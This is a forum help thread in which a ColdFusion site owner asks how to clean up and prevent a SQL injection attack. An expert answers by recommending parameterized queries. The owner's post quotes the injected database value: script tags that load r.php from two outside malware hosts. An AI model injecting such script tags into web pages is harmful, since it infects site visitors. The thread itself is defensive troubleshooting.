Solved

SQL injection attack on windows 2000 server, coldfusion site

Posted on 2013-01-22
4
577 Views
Last Modified: 2013-01-22
Hello,
  We have a Coldfusion site that has been attacked. It is on a windows 2000 server running coldfusion 5 and I need to know how to find and get rid of the malicious code. I have changed the cfquery tag to include cfqueryparam but that has not helped. Currently users are periodically getting this error:

Danger: Malware Ahead!
Google Chrome has blocked access to this page on www.ourweburl.net
Content from hgbyju.com, a known malware distributor, has been inserted into this web page. Visiting this page now is very likely to infect your computer with malware.

I cannot locate any tools that will run on the server and malwarebytes did not find anything. Any assistance would be greatly appreciated.

I just found where the malicious code was placed in our table and removed it but how do I prevent it from returning?   Here is what had been entered into one of the columns on multiple records.
              </title><script src=http://hgbyju.com/r.php ></script>                 </title><script src=http://nmmkmm.com/r.php ></script>
0
Comment
Question by:jdines
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 2
  • 2
4 Comments
 
LVL 33

Expert Comment

by:Big Monty
ID: 38807069
to prevent the code from coming back, you're going to need to alter your code to either sanitize your data inputs or use prepared sql queries:

http://stackoverflow.com/questions/60174/how-to-prevent-sql-injection-in-php

it'll take some time but will ultimately save you these types of headaches when they occur.
0
 

Author Comment

by:jdines
ID: 38807160
Hello,
  My page is actually a Coldfusion page so I searched how to prevent sql injection in coldfusion and came up with this:

http://stackoverflow.com/questions/2592700/how-do-i-prevent-sql-injection-with-coldfusion

I have actually already updated the queries so will this take care of future problems? Thanks.
0
 
LVL 33

Accepted Solution

by:
Big Monty earned 500 total points
ID: 38807197
that should take of it, unless you have other open avenues to your data
0
 

Author Closing Comment

by:jdines
ID: 38807321
Thank you very much!
0

Featured Post

On Demand Webinar: Networking for the Cloud Era

Did you know SD-WANs can improve network connectivity? Check out this webinar to learn how an SD-WAN simplified, one-click tool can help you migrate and manage data in the cloud.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Recently we ran in to an issue while running some SQL jobs where we were trying to process the cubes.  We got an error saying failure stating 'NT SERVICE\SQLSERVERAGENT does not have access to Analysis Services. So this is a way to automate that wit…
A 2007 NCSA Cyber Security survey revealed that a mere 4% of the population has a full understanding of firewalls. As business owner, you should be part of that 4% that has a full understanding.
Using examples as well as descriptions, and references to Books Online, show the different Recovery Models available in SQL Server and explain, as well as show how full, differential and transaction log backups are performed
Viewers will learn how the fundamental information of how to create a table.

724 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question